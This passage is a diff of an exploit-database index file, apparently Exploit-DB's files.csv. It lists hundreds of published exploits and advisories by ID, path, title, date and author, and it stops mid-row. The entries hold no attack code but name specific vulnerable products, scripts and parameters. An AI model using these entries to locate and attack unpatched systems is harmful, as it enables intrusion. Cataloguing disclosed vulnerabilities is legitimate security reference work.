25952,platforms/cgi/webapps/25952.txt,"Pngren 2.0.1 Kaiseki.CGI Remote Command Execution Vulnerability",2005-07-07,blahplok,cgi,webapps,0 @@ -23056,9 +23116,9 @@ id,file,description,date,author,platform,type,port 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers <= fw: 2.3.9 - Remote Root File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 25970,platforms/linux/remote/25970.py,"Exim sender_address Parameter - RCE Exploit",2013-06-05,eKKiM,linux,remote,0 -25971,platforms/php/webapps/25971.txt,"Cuppa CMS (alertConfigField.php, urlConfig param) - Remote/Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 +25971,platforms/php/webapps/25971.txt,"Cuppa CMS (alertConfigField.php urlConfig param) - Remote/Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 25972,platforms/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos,0 -25973,platforms/php/webapps/25973.txt,"RuubikCMS 1.1.1 (tinybrowser.php, folder param) - Path Traversal Vulnerability",2013-06-05,expl0i13r,php,webapps,0 +25973,platforms/php/webapps/25973.txt,"RuubikCMS 1.1.1 (tinybrowser.php folder param) - Path Traversal Vulnerability",2013-06-05,expl0i13r,php,webapps,0 25974,platforms/osx/dos/25974.txt,"Mac OS X Server DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0 25975,platforms/linux/remote/25975.rb,"MiniUPnPd 1.0 - Stack Buffer Overflow Remote Code Execution",2013-06-05,metasploit,linux,remote,5555 25976,platforms/hardware/webapps/25976.txt,"DS3 - Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 @@ -23092,6 +23152,10 @@ id,file,description,date,author,platform,type,port 26005,platforms/windows/dos/26005.pl,"Alt-N MDaemon 8.0 IMAP Server CREATE Remote Buffer Overflow Vulnerability",2005-07-19,kcope,windows,dos,0 26006,platforms/multiple/remote/26006.txt,"Oracle Reports Server 6.0.8/9.0.x Unauthorized Report Execution Vulnerability",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26007,platforms/php/webapps/26007.txt,"PHP Ticket System Beta 1 - CSRF Vulnerability",2013-06-07,"Pablo Ribeiro",php,webapps,0 +26293,platforms/php/webapps/26293.txt,"JPortal 2.2.1/2.3.1 Download.PHP SQL Injection Vulnerability",2005-08-21,krasza,php,webapps,0 +26294,platforms/php/webapps/26294.txt,"PHPMyFAQ 1.5.1 Password.PHP SQL Injection Vulnerabililty",2005-08-23,retrogod@aliceposta.it,php,webapps,0 +26295,platforms/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,php,webapps,0 +26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Include Vulnerability",2005-08-23,rgod,php,webapps,0 26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - CSRF Vulnerability",2013-06-07,"Pablo Ribeiro",php,webapps,0 26010,platforms/windows/dos/26010.py,"Quick TFTP Server 2.2 - Denial of Service",2013-06-07,npn,windows,dos,0 26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment Local File Inclusion Vulnerability",2013-06-07,metasploit,windows,remote,80 @@ -23125,7 +23189,7 @@ id,file,description,date,author,platform,type,port 26040,platforms/php/webapps/26040.txt,"BMForum 3.0 forums.php Multiple Parameter XSS",2005-07-27,Lostmon,php,webapps,0 26041,platforms/php/webapps/26041.txt,"BMForum 3.0 post.php forumid Parameter XSS",2005-07-27,Lostmon,php,webapps,0 26042,platforms/php/webapps/26042.txt,"BMForum 3.0 announcesys.php forumid Parameter XSS",2005-07-27,Lostmon,php,webapps,0 -26043,platforms/php/webapps/26043.txt,"Clever Copy 2.0 Private Message Unauthorized Access Vulnerability",2005-07-27,Lostmon,php,webapps,0 +26043,platforms/php/webapps/26043.txt,"Clever Copy 2.0 - Private Message Unauthorized Access Vulnerability",2005-07-27,Lostmon,php,webapps,0 26044,platforms/windows/remote/26044.txt,"MDaemon 8.0 Content Filter Directory Traversal Vulnerability",2005-07-27,"Tan Chew Keong",windows,remote,0 26045,platforms/php/webapps/26045.txt,"PHPList 2.8.12 Admin Page SQL Injection Vulnerability",2005-07-28,tgo,php,webapps,0 26046,platforms/cgi/webapps/26046.txt,"@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-28,Lostmon,cgi,webapps,0 @@ -23148,7 +23212,7 @@ id,file,description,date,author,platform,type,port 26063,platforms/php/webapps/26063.txt,"Naxtor Shopping Cart 1.0 Lost_password.PHP Cross-Site Scripting Vulnerability",2005-08-02,"John Cobb",php,webapps,0 26064,platforms/php/webapps/26064.txt,"Naxtor Shopping Cart 1.0 Shop_Display_Products.PHP SQL Injection Vulnerability",2005-08-02,"John Cobb",php,webapps,0 26065,platforms/cfm/webapps/26065.txt,"Fusebox 4.1 Index.CFM Cross-Site Scripting Vulnerability",2005-08-03,N.N.P,cfm,webapps,0 -26066,platforms/cgi/webapps/26066.txt,"Karrigell 1.x/2.0/2.1 KS File Arbitrary Python Command Execution Vulnerability",2005-07-31,"Radovan Garabík",cgi,webapps,0 +26066,platforms/cgi/webapps/26066.txt,"Karrigell 1.x/2.0/2.1 KS File Arbitrary Python Command Execution Vulnerability",2005-07-31,"Radovan Garabík",cgi,webapps,0 26067,platforms/php/webapps/26067.txt,"Web Content Management validsession.php strRootpath Parameter XSS",2005-08-03,rgod,php,webapps,0 26068,platforms/php/webapps/26068.txt,"Web Content Management List.php strTable Parameter XSS",2005-08-03,rgod,php,webapps,0 26069,platforms/asp/webapps/26069.txt,"Naxtor E-directory 1.0 Message.ASP Cross-Site Scripting Vulnerability",2005-08-03,basher13,asp,webapps,0 @@ -23156,9 +23220,14 @@ id,file,description,date,author,platform,type,port 26071,platforms/multiple/remote/26071.txt,"NetworkActiv Web Server 1.0/2.0/3.0/3.5 - Cross-Site Scripting Vulnerability",2005-08-04,"Secunia Research",multiple,remote,0 26072,platforms/php/webapps/26072.txt,"PortailPHP 2.4 Index.PHP SQL Injection Vulnerability",2005-08-04,abducter_minds@yahoo.com,php,webapps,0 26073,platforms/jsp/webapps/26073.txt,"Resin Application Server 4.0.36 Source Code Disclosure Vulnerability",2013-06-10,LiquidWorm,jsp,webapps,0 +26332,platforms/multiple/remote/26332.txt,"Oracle 9 XML DB Cross-Site Scripting Vulnerability",2005-10-07,"Alexander Kornbrust",multiple,remote,0 +26327,platforms/php/webapps/26327.txt,"Utopia News Pro 1.1.3 header.php sitetitle Parameter XSS",2005-10-07,rgod,php,webapps,0 26075,platforms/hardware/remote/26075.txt,"MobileIron Virtual Smartphone Platform Privilege Escalation Exploit",2013-06-10,prdelka,hardware,remote,0 26076,platforms/hardware/dos/26076.py,"Cisco ASA < 8.4.4.6 & 8.2.5.32 - Ethernet Information Leak",2013-06-10,prdelka,hardware,dos,0 26077,platforms/php/webapps/26077.txt,"concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities",2013-06-10,expl0i13r,php,webapps,0 +26297,platforms/php/webapps/26297.txt,"PHPMyFAQ 1.5.1 Logs Unauthorized Access Vulnerability",2005-08-23,rgod,php,webapps,0 +26298,platforms/php/webapps/26298.txt,"CMS Made Simple 0.10 Index.PHP Cross-Site Scripting Vulnerability",2005-09-26,X1ngBox,php,webapps,0 +26299,platforms/windows/remote/26299.c,"multitheftauto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0 26079,platforms/php/webapps/26079.txt,"Comdev ECommerce 3.0 Config.PHP Remote File Include Vulnerability",2005-08-05,anonymous,php,webapps,0 26080,platforms/php/webapps/26080.txt,"Comdev eCommerce 3.0 WCE.Download.PHP Directory Traversal Vulnerability",2005-08-05,anonymous,php,webapps,0 26081,platforms/php/webapps/26081.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 dwt_editor.php Multiple Parameter XSS",2005-08-05,Lostmon,php,webapps,0 @@ -23205,7 +23274,7 @@ id,file,description,date,author,platform,type,port 26122,platforms/php/webapps/26122.txt,"FunkBoard 0.66 register.php Multiple Parameter XSS",2005-08-08,rgod,php,webapps,0 26123,platforms/multiple/remote/26123.rb,"Java Web Start Double Quote Injection Remote Code Execution",2013-06-11,Rh0,multiple,remote,0 26124,platforms/php/webapps/26124.txt,"Wordpress WP-SendSms Plugin 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,php,webapps,0 -26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c (editor.php, mapname param) - Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0 +26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c (editor.php mapname param) - Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0 26126,platforms/php/webapps/26126.txt,"NanoBB 0.7 - Multiple Vulnerabilities",2013-06-11,"CWH Underground",php,webapps,0 26127,platforms/php/webapps/26127.txt,"TriggerTG TClanPortal 3.0 - Multiple SQL Injection Vulnerabilities",2005-08-09,admin@batznet.com,php,webapps,0 26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service Vulnerability",2005-08-09,"Patrick Webster",osx,dos,0 @@ -23216,7 +23285,7 @@ id,file,description,date,author,platform,type,port 26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21 26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,metasploit,windows,remote,0 26135,platforms/multiple/remote/26135.rb,"Java Applet Driver Manager Privileged toString() Remote Code Execution",2013-06-11,metasploit,multiple,remote,0 -26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 (edit_event.php, eventid param) - SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 +26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 (edit_event.php eventid param) - SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 26137,platforms/windows/dos/26137.py,"Syslog Server 1.2.3 - Crash PoC",2013-06-12,npn,windows,dos,0 26138,platforms/hardware/dos/26138.txt,"Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow",2013-06-12,"Core Security",hardware,dos,554 26139,platforms/windows/dos/26139.txt,"Gaim AIM/ICQ Protocols Multiple Vulnerabilities",2005-08-10,"Brandon Perry",windows,dos,0 @@ -23253,8 +23322,8 @@ id,file,description,date,author,platform,type,port 26170,platforms/php/webapps/26170.txt,"ATutor 1.5.1 login.php course Parameter XSS",2005-08-18,matrix_killer,php,webapps,0 26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 Prod.PHP Arbitrary Command Execution Vulnerability",2005-08-18,rgod,php,webapps,0 26172,platforms/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,php,webapps,0 -26173,platforms/windows/dos/26173.txt,"AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method",2013-06-13,"Javier Repiso Snchez",windows,dos,0 -26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Snchez, Lopez, Castillo",hardware,webapps,0 +26173,platforms/windows/dos/26173.txt,"AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method",2013-06-13,"Javier Repiso Sánchez",windows,dos,0 +26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez, Lopez, Castillo",hardware,webapps,0 26175,platforms/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009)",2013-06-13,metasploit,windows,remote,0 26176,platforms/php/webapps/26176.txt,"Woltlab Burning Board 2.x ModCP.PHP SQL Injection Vulnerability",2005-08-20,[R],php,webapps,0 26177,platforms/php/webapps/26177.txt,"Land Down Under 800/801 links.php w Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 @@ -23347,6 +23416,8 @@ id,file,description,date,author,platform,type,port 26266,platforms/php/webapps/26266.txt,"DeluxeBB 1.0 forums.php fid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 26267,platforms/php/webapps/26267.txt,"DeluxeBB 1.0 pm.php uid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 26268,platforms/php/webapps/26268.txt,"DeluxeBB 1.0 newpost.php fid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 +26333,platforms/asp/webapps/26333.html,"Aenovo /password/default.asp password Field SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 +26334,platforms/asp/webapps/26334.txt,"aeNovo /incs/searchdisplay.asp strSQL Parameter SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 26270,platforms/php/webapps/26270.txt,"Content2Web 1.0.1 - Multiple Input Validation Vulnerabilities",2005-09-16,"Security Tester",php,webapps,0 26271,platforms/osx/dos/26271.txt,"Apple Safari 1.x/2.0.1 Data URI Memory Corruption Vulnerability",2005-09-17,"Jonathan Rockway",osx,dos,0 26272,platforms/php/webapps/26272.txt,"EPay Pro 2.0 Index.PHP Directory Traversal Vulnerability",2005-09-19,h4cky0u,php,webapps,0 @@ -23365,18 +23436,6 @@ id,file,description,date,author,platform,type,port 26285,platforms/php/webapps/26285.txt,"Hesk 0.92/0.93 Session ID Authentication Bypass Vulnerability",2005-09-20,"Rajesh Sethumadhavan",php,webapps,0 26286,platforms/php/webapps/26286.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Directory Traversal Vulnerabilities",2005-09-20,rgod,php,webapps,0 26287,platforms/php/webapps/26287.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-20,rgod,php,webapps,0 -26288,platforms/linux/remote/26288.txt,"Mozilla Browser/Firefox - Arbitrary Command Execution Vulnerability",2005-09-20,"eter Zelezny",linux,remote,0 -26289,platforms/cgi/webapps/26289.txt,"Alkalay.Net Multiple Scripts Arbitrary Remote Command Execution Vulnerabilities",2005-08-21,sullo@cirt.net,cgi,webapps,0 -26290,platforms/cgi/webapps/26290.txt,"PerlDiver 2.31 Perldiver.CGI Cross-Site Scripting Vulnerability",2005-08-21,"Donnie Werner",cgi,webapps,0 -26291,platforms/asp/webapps/26291.txt,"Mall23 AddItem.ASP SQL Injection Vulnerability",2005-08-21,SmOk3,asp,webapps,0 -26292,platforms/osx/dos/26292.html,"Microsoft Internet Explorer 5.2.3 for Mac OS Denial of Service Vulnerability",2005-08-22,"Mella Marco",osx,dos,0 -26293,platforms/php/webapps/26293.txt,"JPortal 2.2.1/2.3.1 Download.PHP SQL Injection Vulnerability",2005-08-21,krasza,php,webapps,0 -26294,platforms/php/webapps/26294.txt,"PHPMyFAQ 1.5.1 Password.PHP SQL Injection Vulnerabililty",2005-08-23,retrogod@aliceposta.it,php,webapps,0 -26295,platforms/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,php,webapps,0 -26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Include Vulnerability",2005-08-23,rgod,php,webapps,0 -26297,platforms/php/webapps/26297.txt,"PHPMyFAQ 1.5.1 Logs Unauthorized Access Vulnerability",2005-08-23,rgod,php,webapps,0 -26298,platforms/php/webapps/26298.txt,"CMS Made Simple 0.10 Index.PHP Cross-Site Scripting Vulnerability",2005-09-26,X1ngBox,php,webapps,0 -26299,platforms/windows/remote/26299.c,"multitheftauto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0 26300,platforms/php/webapps/26300.txt,"LucidCMS 2.0 Index.PHP Cross-Site Scripting Vulnerability",2005-09-27,X1ngBox,php,webapps,0 26301,platforms/windows/dos/26301.txt,"Novell GroupWise 6.5.3 Client Local Integer Overflow Vulnerability",2005-09-27,"Francisco Amato",windows,dos,0 26302,platforms/php/webapps/26302.txt,"TWiki TWikiUsers INCLUDE Function Remote Arbitrary Command Execution Vulnerability",2005-09-28,JChristophFuchs,php,webapps,0 @@ -23391,23 +23450,21 @@ id,file,description,date,author,platform,type,port 26311,platforms/php/webapps/26311.txt,"IceWarp Web Mail 5.5.1 calendar_w.html createdataCX Parameter XSS",2005-09-30,ss_contacts,php,webapps,0 26312,platforms/php/webapps/26312.txt,"EasyGuppy 4.5.4/4.5.5 Printfaq.PHP Directory Traversal Vulnerability",2005-09-30,"Josh Zlatin-Amishav",php,webapps,0 26313,platforms/php/webapps/26313.txt,"Merak Mail Server 8.2.4 r Arbitrary File Deletion Vulnerability",2005-09-30,ShineShadow,php,webapps,0 +26386,platforms/php/webapps/26386.txt,"Nuked-Klan 1.7 Forum Module Multiple Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 +26387,platforms/php/webapps/26387.txt,"Nuked-Klan 1.7 Sections Module artid Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 26316,platforms/php/webapps/26316.php,"imacs CMS 0.3.0 - Unrestricted File Upload Exploit",2013-06-19,"CWH Underground",php,webapps,0 +26330,platforms/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 wwv_flow.accept p_t02 Parameter XSS",2005-10-07,Red-Database-Security,multiple,remote,0 +26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial of Service Vulnerability",2005-10-07,"Alexander Kornbrust",multiple,dos,0 26318,platforms/hardware/remote/26318.py,"TP-Link Print Server TL PS110U - Sensitive Information Enumeration",2013-06-19,SANTHO,hardware,remote,0 26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh, Mormoroth",php,webapps,0 +26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 footer.php Multiple Parameter XSS",2005-10-07,rgod,php,webapps,0 +26329,platforms/multiple/remote/26329.txt,"Oracle HTML DB 1.5/1.6 f p Parameter XSS",2005-10-07,Red-Database-Security,multiple,remote,0 26321,platforms/linux/local/26321.c,"Gnome-PTY-Helper UTMP Hostname Spoofing Vulnerability",2005-10-03,"Paul Szabo",linux,local,0 26322,platforms/windows/dos/26322.pl,"MusicBee 2.0.4663 - (.m3u) Denial of Service Exploit",2013-06-19,Chako,windows,dos,0 26323,platforms/windows/local/26323.cpp,"Microsoft Windows XP Wireless Zero Configuration Service Information Disclosure Vulnerability",2005-10-04,"Laszlo Toth",windows,local,0 26324,platforms/php/webapps/26324.txt,"TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-05,"Donnie Werner",php,webapps,0 26325,platforms/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 IFRAME Handling Denial of Service Vulnerability",2005-10-05,"Tom Ferris",multiple,dos,0 26326,platforms/php/webapps/26326.html,"MyBloggie 2.1.3 - Search.PHP SQL Injection Vulnerability",2005-10-06,trueend5,php,webapps,0 -26327,platforms/php/webapps/26327.txt,"Utopia News Pro 1.1.3 header.php sitetitle Parameter XSS",2005-10-07,rgod,php,webapps,0 -26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 footer.php Multiple Parameter XSS",2005-10-07,rgod,php,webapps,0 -26329,platforms/multiple/remote/26329.txt,"Oracle HTML DB 1.5/1.6 f p Parameter XSS",2005-10-07,Red-Database-Security,multiple,remote,0 -26330,platforms/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 wwv_flow.accept p_t02 Parameter XSS",2005-10-07,Red-Database-Security,multiple,remote,0 -26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial of Service Vulnerability",2005-10-07,"Alexander Kornbrust",multiple,dos,0 -26332,platforms/multiple/remote/26332.txt,"Oracle 9 XML DB Cross-Site Scripting Vulnerability",2005-10-07,"Alexander Kornbrust",multiple,remote,0 -26333,platforms/asp/webapps/26333.html,"Aenovo /password/default.asp password Field SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 -26334,platforms/asp/webapps/26334.txt,"aeNovo /incs/searchdisplay.asp strSQL Parameter SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 26335,platforms/asp/webapps/26335.txt,"Aenovo Multiple Unspecified Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps,0 26336,platforms/multiple/remote/26336.txt,"Oracle Forms Servlet TLS Listener Remote Denial of Service Vulnerability",2005-10-07,"Alexander Kornbrust",multiple,remote,0 26337,platforms/php/webapps/26337.php,"Cyphor 0.19 lostpwd.php nick Field SQL Injection",2005-10-08,rgod,php,webapps,0 @@ -23455,12 +23512,10 @@ id,file,description,date,author,platform,type,port 26379,platforms/php/webapps/26379.txt,"Chipmunk Forum quote.php forumID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26380,platforms/php/webapps/26380.txt,"Chipmunk Forum recommend.php ID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26381,platforms/php/webapps/26381.txt,"Chipmunk Directory recommend.php entryID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 -26382,platforms/linux/local/26382.c,"Linux Kernel 2.6.x - IPV6 - Local Denial of Service Vulnerability",2005-10-20,"Rmi Denis-Courmont",linux,local,0 +26382,platforms/linux/local/26382.c,"Linux Kernel 2.6.x - IPV6 - Local Denial of Service Vulnerability",2005-10-20,"Rémi Denis-Courmont",linux,local,0 26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 Detail.PHP HTML Injection Vulnerability",2005-10-22,sikikmail,php,webapps,0 26384,platforms/php/webapps/26384.txt,"FlatNuke 2.5.x Index.PHP Multiple Remote File Include Vulnerabilities",2005-10-22,abducter_minds@yahoo.com,php,webapps,0 26385,platforms/php/webapps/26385.txt,"FlatNuke 2.5.x Index.PHP Cross-Site Scripting Vulnerability",2005-10-26,alex@aleksanet.com,php,webapps,0 -26386,platforms/php/webapps/26386.txt,"Nuked-Klan 1.7 Forum Module Multiple Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 -26387,platforms/php/webapps/26387.txt,"Nuked-Klan 1.7 Sections Module artid Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 26388,platforms/php/webapps/26388.txt,"Nuked-Klan 1.7 Download Module dl_id Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 26389,platforms/php/webapps/26389.pl,"Nuked-Klan 1.7 Links Module link_id Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 26390,platforms/php/webapps/26390.txt,"saphp Lesson add.php forumid Parameter SQL Injection",2005-10-26,almaster,php,webapps,0 @@ -23478,17 +23533,21 @@ id,file,description,date,author,platform,type,port 26402,platforms/windows/local/26402.py,"Mediacoder (.lst) - SEH Buffer Overflow",2013-06-24,metacom,windows,local,0 26403,platforms/windows/local/26403.py,"Mediacoder (.m3u) - SEH Buffer Overflow",2013-06-24,metacom,windows,local,0 26404,platforms/windows/local/26404.py,"MediaCoder PMP Edition 0.8.17 - (.m3u) Buffer Overflow Exploit",2013-06-24,metacom,windows,local,0 -26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 (play.php, gid param) - SQL Injection Vulnerability",2013-06-24,"AtT4CKxT3rR0r1ST ",php,webapps,0 +26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 (play.php gid param) - SQL Injection Vulnerability",2013-06-24,"AtT4CKxT3rR0r1ST ",php,webapps,0 26406,platforms/php/webapps/26406.txt,"Alienvault OSSIM Open Source SIEM 4.1 - Multiple SQL Vulnerabilities",2013-06-24,"Glafkos Charalambous ",php,webapps,0 +27541,platforms/php/webapps/27541.txt,"DbbS 2.0 Topics.PHP SQL Injection Vulnerability",2006-03-31,DaBDouB-MoSiKaR,php,webapps,0 +27542,platforms/php/webapps/27542.txt,"SoftBiz Image Gallery - mage_desc.php Multiple Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 +27543,platforms/php/webapps/27543.txt,"SoftBiz Image Gallery - template.php provided Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 26408,platforms/php/webapps/26408.txt,"phpEventCalendar 0.2.3 - Multiple Vulnerabilities",2013-06-24,"AtT4CKxT3rR0r1ST ",php,webapps,0 26409,platforms/windows/local/26409.py,"aSc Timetables 2013 - Stack Buffer Overflow Vulnerability",2013-06-24,Dark-Puzzle,windows,local,0 -26410,platforms/php/webapps/26410.py,"Collabtive 1.0 (manageuser.php, task param) - SQL Injection Vulnerability",2013-06-24,drone,php,webapps,0 +26410,platforms/php/webapps/26410.py,"Collabtive 1.0 (manageuser.php task param) - SQL Injection Vulnerability",2013-06-24,drone,php,webapps,0 26411,platforms/windows/local/26411.py,"AudioCoder 0.8.22 - (.m3u) Direct Retn Buffer Overflow",2013-06-24,Onying,windows,local,0 26412,platforms/hardware/remote/26412.pl,"Seowonintech Devices - Remote Root Exploit",2013-06-24,"Todor Donev",hardware,remote,0 26413,platforms/windows/dos/26413.py,"PEiD 0.95 - Memory Corruption PoC",2013-06-24,"Debasish Mandal",windows,dos,0 26414,platforms/php/webapps/26414.txt,"PodHawk 1.85 - Arbitary File Upload Vulnerability",2013-06-24,"CWH Underground",php,webapps,0 26415,platforms/hardware/webapps/26415.txt,"Linksys X3000 1.0.03 build 001 - Multiple Vulnerabilities",2013-06-24,m-1-k-3,hardware,webapps,0 -26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 (global.php, id param) - SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 +26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 (global.php id param) - SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 +26827,platforms/php/webapps/26827.txt,"QuickPayPro 3.1 popups.edit.php popupid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation",2013-06-24,metasploit,windows,local,0 26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 htpasswd Module Username Command Execution",2013-06-24,metasploit,linux,remote,0 26420,platforms/windows/remote/26420.rb,"HP System Management Homepage JustGetSNMPQueue Command Injection",2013-06-24,metasploit,windows,remote,2381 @@ -23524,7 +23583,7 @@ id,file,description,date,author,platform,type,port 26450,platforms/windows/dos/26450.pl,"Baby FTP Server 1.24 - Denial of Service",2013-06-26,Chako,windows,dos,21 26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Local Privilege Escalation Exploit",2013-06-26,metasploit,linux,local,0 26452,platforms/win32/local/26452.rb,"Novell Client 2 SP3 nicm.sys Local Privilege Escalation",2013-06-26,metasploit,win32,local,0 -26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 (index.php, type param) - Remote Code Execution",2013-06-26,infodox,php,webapps,0 +26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 (index.php type param) - Remote Code Execution",2013-06-26,infodox,php,webapps,0 26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 Address Space Manipulation Privilege Escalation",2013-06-26,metasploit,freebsd,local,0 26455,platforms/php/webapps/26455.txt,"VUBB Index.PHP Cross-Site Scripting Vulnerability",2005-11-01,"Alireza Hassani",php,webapps,0 26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 Post.PHP SQL Injection Vulnerability",2005-11-01,almaster,php,webapps,0 @@ -23559,7 +23618,7 @@ id,file,description,date,author,platform,type,port 26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 Error Page XSS",2005-11-09,"Leandro Meiners",php,webapps,0 26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 frameset.htm sap-syscmd Parameter XSS",2005-11-09,"Leandro Meiners",php,webapps,0 26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 URI Redirection Vulnerability",2005-11-09,"Leandro Meiners",php,webapps,0 -26489,platforms/linux/local/26489.c,"Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service Vulnerability",2005-11-09,"Rmi Denis-Courmont",linux,local,0 +26489,platforms/linux/local/26489.c,"Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service Vulnerability",2005-11-09,"Rémi Denis-Courmont",linux,local,0 26490,platforms/php/webapps/26490.txt,"TikiWiki 1.9 Tiki-view_forum_thread.PHP Cross-Site Scripting Vulnerability",2005-11-09,"Moritz Naumann",php,webapps,0 26491,platforms/windows/remote/26491.txt,"Antville 1.1 - Cross-Site Scripting Vulnerability",2005-11-09,"Moritz Naumann",windows,remote,0 26492,platforms/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution Vulnerability",2002-12-31,"Georgi Guninski",linux,local,0 @@ -23588,10 +23647,13 @@ id,file,description,date,author,platform,type,port 26515,platforms/php/webapps/26515.txt,"AlstraSoft Template Seller Pro 3.25 - Remote File Include Vulnerability",2005-11-15,"Robin Verton",php,webapps,0 26516,platforms/php/webapps/26516.txt,"Ekinboard 1.0.3 Profile.PHP Cross-Site Scripting Vulnerability",2005-11-15,trueend5,php,webapps,0 26517,platforms/windows/dos/26517.txt,"Microsoft Office PowerPoint 2007 - Crash PoC",2013-07-01,Asesino04,windows,dos,0 +26829,platforms/php/webapps/26829.txt,"QuickPayPro 3.1 subscribers.tracking.edit.php subtrackingid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 +26830,platforms/php/webapps/26830.txt,"QuickPayPro 3.1 design.php delete Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26519,platforms/windows/dos/26519.py,"AVS Media Player 